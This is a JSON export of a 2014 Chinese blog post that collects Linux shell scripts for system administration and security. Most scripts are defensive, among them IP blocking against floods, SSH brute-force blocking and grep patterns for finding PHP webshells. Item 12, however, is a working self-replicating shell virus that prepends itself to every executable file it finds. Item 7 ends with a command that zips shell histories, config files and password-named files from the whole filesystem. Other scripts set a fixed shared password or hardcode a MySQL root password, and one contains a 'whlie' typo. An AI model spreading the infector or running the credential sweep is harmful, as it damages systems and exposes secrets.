{"id":234,"date":"2014-06-29T09:16:28","date_gmt":"2014-06-29T09:16:28","guid":{"rendered":"http:\/\/ixyzero.com\/blog\/?p=234"},"modified":"2014-06-29T09:16:28","modified_gmt":"2014-06-29T09:16:28","slug":"%e4%b8%80%e4%ba%9bshell%e8%84%9a%e6%9c%ac%e7%9a%84%e6%90%9c%e9%9b%86","status":"publish","type":"post","link":"https:\/\/ixyzero.com\/blog\/archives\/234.html","title":{"rendered":"\u4e00\u4e9bshell\u811a\u672c\u7684\u641c\u96c6"},"content":{"rendered":"
\u4e00\u3001\u9632DDoS\u7684\u4e00\u4e2a\u601d\u8def(\u76f4\u63a5\u5c4f\u853d)\uff1a<\/h5>\n
#!\/bin\/bash\n\/bin\/netstat -na | grep ESTABLISHED | awk '{print $5}' | awk -F: '{print $1}' | sort | uniq -c | sort -rn | head -10 | grep -v -E '192.168|127.0' | awk '{if($2!=null && $1>4) {print $2}}' > \/tmp\/dropip\nfor i in $(cat \/tmp\/dropip)\ndo\n    \/sbin\/iptables -A INPUT -s $i -j DROP\n    echo \"$i kill at `date`\">>\/var\/log\/ddos\ndone<\/pre>\n
\u4e8c\u3001\u6279\u91cf\u6dfb\u52a0\u7528\u6237<\/h5>\n
#!\/bin\/bash\nfor name in tom jerry joe jane\ndo\n\tuseradd $name\n\techo redhat | passwd --stdin $name\ndone<\/pre>\n
\u4e09\u3001\u6279\u91cfping\u5224\u65ad\u5c40\u57df\u7f51\u4e3b\u673a\u5b58\u6d3b\u60c5\u51b5<\/h5>\n
#!\/bin\/bash\n# Checks to see if hosts 192.168.1.100-192.168.1.200 are alive\nfor n in {100..200}; do\n\thost=192.168.1.$n\n\tping -c2 $host & >\/dev\/null\n\tif [ $? = 0 ]; then\n\t\techo \"$host is UP\"\n\telse\n\t\techo \"$host is DOWN\"\n\tfi\ndone<\/pre>\n
\u56db\u3001\u8d77\u5230\u7c7b\u4f3cDenyHosts\u4f5c\u7528\u7684bash\u811a\u672c<\/h5>\n
Ubuntu\u7248\u672c\uff1a<\/p>\n
#!\/bin\/bash\ncat \/var\/log\/auth.log.1 | awk '\/Invalid user\/{print $NF}' | sort | uniq -c | awk '{print $2\"=\"$1;}'  >\/root\/black.txt\n# awk '\/Invalid user\/{print $NF}' auth.log.1 | sort | uniq -c | awk '{print $2\"=\"$1;}'  >\/root\/black.txt\nDEFINE=\"10\"\n\nfor i in `cat  \/root\/black.txt`\ndo\n\tIP=`echo $i | awk -F= '{print $1}'`\n\tNUM=`echo $i | awk -F= '{print $2}'`\n\tif [ $NUM -gt $DEFINE ];\n\tthen\n\t\tgrep $IP \/etc\/hosts.deny > \/dev\/null\n\t\tif [ $? -gt 0 ];\n\t\tthen\n\t\t\techo \"sshd:$IP\" >> \/etc\/hosts.deny\n\t\tfi\n\tfi\ndone\n\n#vim \/etc\/crontab\n#* *\/1 * * * root sh \/root\/ssh_deny.sh\t#\u6bcf\u9694\u4e00\u4e2a\u5c0f\u65f6\u6267\u884c\u4e00\u6b21<\/pre>\n
\u9002\u7528\u4e8eRedHat\u7cfb\u5217\u7684\u7248\u672c\uff1a<\/p>\n
#!\/bin\/bash\ncat \/var\/log\/secure | awk '\/Failed\/{print $(NF-3)}' | sort | uniq -c | awk '{print $2\"=\"$1;}'  >\/root\/black.txt\nDEFINE=\"10\"\n\nfor i in `cat  \/root\/black.txt`\ndo\n\tIP=`echo $i | awk -F= '{print $1}'`\n\tNUM=`echo $i | awk -F= '{print $2}'`\n\tif [ $NUM -gt $DEFINE ];\n\tthen\n\t\tgrep $IP \/etc\/hosts.deny > \/dev\/null\n\t\tif [ $? -gt 0 ];\n\t\tthen\n\t\t\techo \"sshd:$IP\" >> \/etc\/hosts.deny\n\t\tfi\n\tfi\ndone\n\n#vim \/etc\/crontab\n#* *\/1 * * * root sh \/root\/ssh_deny.sh\t#\u6bcf\u9694\u4e00\u4e2a\u5c0f\u65f6\u6267\u884c\u4e00\u6b21<\/pre>\n
\u4e94\u3001\u6279\u91cf\u6dfb\u52a0\u53ef\u6267\u884c\u6743\u9650<\/h5>\n
#!\/bin\/bash\nfind \"$PWD\" -type f ( -iname '*.sh' -o  -iname '*.csh' -o  -iname '*.ksh' -o -iname '*.pl' -o -iname '*.bin' -o -iname '*.run' -o -iname '*.bundle' -o -iname '*.rb' -o -iname '*.py' ) -print0 | xargs -0 chmod +x<\/pre>\n
\u516d\u3001\u5b9a\u4f4d\u53ef\u7591\u6587\u4ef6<\/h5>\n
#!\/bin\/bash\n\n#\u67e5\u770b\u5f53\u524d\u8fd9\u4e2a\u76ee\u5f55\u91cc\u9762\u662f\u5426\u6709\u53ef\u7591\u6587\u4ef6{\u67e5\u627e\u6743\u9650\u4e3a777\u7684\u76ee\u5f55\u662f\u5426\u5b58\u5728php\u6587\u4ef6}\nsearch_dir=$(pwd)\nwritable_dirs=$(find $search_dir -type d -perm 0777)\nfor dir in $writable_dirs\n    do\n        #echo $dir\n        find $dir -type f -name '*.php'\ndone\n\n#\u9ed1\u5ba2\u7ecf\u5e38\u5728jpg\u6587\u4ef6\u4e2d\u63d2\u5165php\u4ee3\u7801\uff0c\u56e0\u6b64\u5728\u67e5\u8be2\u8fd9\u4e9b\u76ee\u5f55\u7684\u65f6\u5019\u4e5f\u8981\u67e5\u8be2jpg\u6587\u4ef6\nfind wp-content\/uploads -type f -iname '*.jpg' | xargs grep -i php\n#\u6ce8\u610f\uff1a-iname \u8868\u793a\u6587\u4ef6\u540d\u4e0d\u533a\u5206\u5927\u5c0f\u5199\uff1bgrep -i \u4e5f\u8868\u793a\u67e5\u627e\u5185\u5bb9\u4e0d\u533a\u5206\u5927\u5c0f\u5199<\/pre>\n
\u4e03\u3001\u4f7f\u7528find\u547d\u4ee4\u8fdb\u884c\u67e5\u627e-\u6253\u5305<\/h5>\n
find . -type f -name '*.php' -mtime -7\n\nfind . -type f -name '*.php' | xargs grep -l \"eval *(\" --color\t#(\u7a7a\u683c\u540e\u9762\u52a0\u4e0a\u4e2a*\u4ee3\u8868\u5339\u914d\u4efb\u610f\u4e2a\u7a7a\u683c)\nfind . -type f -name '*.php' | xargs grep -l \"base64_decode *(\" --color\nfind . -type f -name '*.php' | xargs grep -l \"gzinflate *(\" --color\nfind . -type f -name '*.php' | xargs grep -l \"eval *(str_rot13 *(base64_decode *(\" --color\n\nfind . -type f -name '*.php' | xargs egrep -i \"(mail|fsockopen|pfsockopen|stream_socket_client|exec|system|passthru|eval|base64_decode) *(\"\n\nfind . -type f -name '*.php' | xargs egrep -i \"preg_replace *((['|\"])(.).*2[a-z]*e[^1]*1 *,\" --color\n\ndiff -r wordpress-clean\/ wordpress-compromised\/ -x wp-content\n#\u4e0a\u9762\u7684\u4f8b\u5b50\u662f\u6bd4\u8f83wordpress-clean\/\u548cwordpress-comprised\/\u8fd9\u4e24\u4e2a\u76ee\u5f55\uff0c\u5e76\u4e14\u76ee\u5f55\u91cc\u9762\u7684wp-content\/\u5b50\u76ee\u5f55\u4e0d\u6bd4\u8f83\n\n####\nfind \/ ! -path \"\/usr\/share\/*\" ! -path \"\/usr\/lib\/*\" ! -path \"\/root\/.pyenv\/*\" -regex \".*.sh$|.*.pl$|.*.py$|.*.conf$|.*.cnf$|.*.ini$|.*\/..*history$|.*\/..*pass.*\" -print | zip pack.zip -@<\/pre>\n
\u516b\u3001\u5220\u9664\u91cd\u590d\u7684\u6587\u4ef6<\/h5>\n
#!\/bin\/bash\n#\u5220\u9664\u6307\u5b9a\u6587\u4ef6\u5939\u4e2d\u5185\u5bb9\u76f8\u540c(Hash\u503c\u76f8\u540c)\u7684\u6587\u4ef6\n#\u7528\u6cd5\uff1a.\/removeDuplicate.sh dir_to_check\n\nls -lS $1 | awk 'BEGIN {\ngetline;getline;\nname1=$9;size=$5\n}\n{ name2=$9; if (size==$5)\n{\n\"md5sum \" name1 | getline; csum1=$1;\n\"md5sum \" name2 | getline; csum2=$1\nif  ( csum1 == csum2 )\n{ print name1; print name2 }\n};\nsize= $5; name1=name2;\n}' | sort -u > duplicate_file\ncat duplicate_file | xargs -I {} md5sum {} | sort | uniq -w 32 | awk '{ print $2 }' | sort -u > duplicate_sample\necho Removing...\ncomm duplicate_file duplicate_sample -2 -3 | tee \/dev\/stderr | xargs rm\necho Removed duplicate files successfully.\ncat duplicate_sample | xargs echo The rest file name is\n#rm -rf duplicate_sample duplicate_file<\/pre>\n
\u4e5d\u3001\u7edf\u8ba1\u6587\u4ef6\u4e2d\u7684\u51fa\u73b0\u7684\u5355\u8bcd\u4e2a\u6570&\u767e\u5206\u6bd4<\/h5>\n
#!\/bin\/bash\n#\u7edf\u8ba1\u6587\u4ef6\u4e2d\u7684\u51fa\u73b0\u7684\u5355\u8bcd\u4e2a\u6570&\u767e\u5206\u6bd4\nif [ $# -ne 1 ]; then\n    echo \"Usage: $0 filename\"\n    exit -1\nfi\n\nfilename=$1\negrep -o \"b[[:alpha:]]+b\" $filename |\nawk '{ count[$0]++;sum++ }\nEND{\n    printf(\"%-14s%-8s%sn\", \"Word\", \"Count\", \"Rate\");\n    for (ind in count) {printf (\"%-14s%-8d%.2f%%n\", ind, count[ind], count[ind]\/sum*100);}\n}'<\/pre>\n
\u5341\u3001\u5217\u51fa\u6307\u5b9a\u8def\u5f84\u4e2d\u7684\u5404\u4e2a\u6587\u4ef6\u7684\u6587\u4ef6\u7c7b\u578b<\/h5>\n
#!\/bin\/bash\n#\u5217\u51fa\u6307\u5b9a\u8def\u5f84\u4e2d\u7684\u5404\u79cd\u6587\u4ef6\u7c7b\u578b\nif  [ $# -ne 1 ];\nthen\n    echo Usage: .\/$0 path_to_check;\n    echo\nfi\n\npath=$1\ndeclare -A statarray;\nwhile read line;\ndo\n    ftype=`file -b \"$line\"`\n    let statarray[\"$ftype\"]++;\n\ndone< <(find $path -type f -print)\n\necho -e [+]File Types And Counts\nfor ftype in \"${!statarray[@]}\";\ndo\n    echo $ftype : ${statarray[\"$ftype\"]}\ndone<\/pre>\n
\u5341\u4e00\u3001\u4ece\u6307\u5b9a\u6587\u4ef6\u4e2d\u63d0\u53d6Email\u548cURL\u7684\u4e2a\u6570<\/h5>\n
#!\/bin\/bash\n#\u4ece\u6307\u5b9a\u6587\u4ef6\u4e2d\u63d0\u53d6Email\u548cURL\u7684\u4e2a\u6570\nif [ $# -ne 1 ]; then\n  echo \"[+]Usage:$0 filename\"\n  exit -a\nfi\n\nfile=$1\n#egrep -o '[A-Za-z0-9.]+@[A-Za-z0-9.]+.[a-zA-Z]{1,4}' $file | sort | uniq -c\n#echo \"[+]Emails found.\"\negrep -o \"http:\/\/[a-zA-Z0-9.]+.[A-Za-z]{1,4}\" $file | sort | uniq -c\necho \"[+]Urls found.\"<\/pre>\n
\u5341\u4e8c\u3001\u81ea\u611f\u67d3\u811a\u672c<\/h6>\n
#!\/bin\/bash\n#Virus by ijse start\n#=====Your Code Here=========\necho \"!This file has been infected by CpVirus written by ijse.\"\necho \"!You can remove the virus code by editing this file.\"\necho \"!Just remove the lines between '#Virus by ijse start' and '#Virus by ijse end'.\"\n#============================\nfor exfile in `find .\/ -executable -type f`\ndo\n    tmpFile=$exfile.tmp\n    firstLine=`head -2 $exfile|tail -1`\n    if [ \"$firstLine\" != \"#Virus by ijse start\" ]; then\n        endnum=`grep -n -x \"#Virus by ijse end\" $0 | awk -F\":\" '{print $1}'`\n        startnum=`grep -n -x \"#Virus by ijse start\" $0 | awk -F\":\" '{print $1}'`\n        let length=$endnum-$startnum+1\n        echo \"`head -$endnum $0|tail -$length`\" > $tmpFile\n        cat $exfile >> $tmpFile\n        chmod u+x $tmpFile\n        rm $exfile\n        mv $tmpFile $exfile\n    fi\ndone\n#Virus by ijse end<\/pre>\n
\u5341\u4e09\u3001\u7528Bash\u8fdb\u884cMySQL\u6279\u91cf\u63d2\u5165\u64cd\u4f5c<\/h6>\n
#!\/bin\/bash\nmysqllogin=\"mysql -uroot -p123456\"  #\u5b9a\u4e49\u4e00\u4e2a\u767b\u9646mysql\u53d8\u91cf\ni=100000    #\u5b9a\u4e49\u4e00\u4e2a\u5b66\u751f\u5b66\u53f7\u53d8\u91cf\uff0c\u521d\u59cb\u503c\u662f100000\np=18200000000   #\u5b9a\u4e49\u4e00\u4e2a\u5b66\u751f\u624b\u673a\u53f7\u7801\u53d8\u91cf \u521d\u59cb\u503c\u662f18200000000\nwhlie test $i -le 109999   #\u5224\u65ad\u662f\u4e0d\u662f$i\u5c0f\u4e8e\u6216\u8005\u7b49\u4e8e109999\uff0c\u7b26\u5408\u5219\u8fd4\u56detrue,\u7ee7\u7eed\u6267\u884c\ndo\n    $mysqllogin -e \"insert into test.students values ($i,$p);\"  #\u5faa\u73af\u63d2\u5165\n    let i=$i+1   # i\u503c\u52a01\n    let p=$p+1   # p\u503c\u52a01\ndone<\/pre>\n
 <\/p>\n
<\/h6>\n
\u5f85\u7eed\u2026\u2026<\/h6>\n
\u8bf4\u660e\uff1a\u5176\u4e2d\u6709\u51e0\u4e2a\u811a\u672c\u7684\u5185\u5bb9\u53c2\u8003\u4e86nightx.info\u5728GitHub\u4e0a\u7684\u4ee3\u7801\uff0c\u81ea\u5df1\u8fdb\u884c\u4e86\u6d4b\u8bd5\u548c\u4e00\u4e9b\u4fee\u6539\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"
\u4e00\u3001\u9632DDoS\u7684\u4e00\u4e2a\u601d\u8def(\u76f4\u63a5\u5c4f\u853d)\uff1a #!\/bin\/bash \/bin\/netstat -na | grep […]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,7,25,12],"tags":[110,65],"class_list":["post-234","post","type-post","status-publish","format-standard","hentry","category-linux","category-programing","category-security","category-tools","tag-ddos","tag-shell"],"views":4539,"_links":{"self":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts\/234","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/comments?post=234"}],"version-history":[{"count":0,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts\/234\/revisions"}],"wp:attachment":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/media?parent=234"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/categories?post=234"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/tags?post=234"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}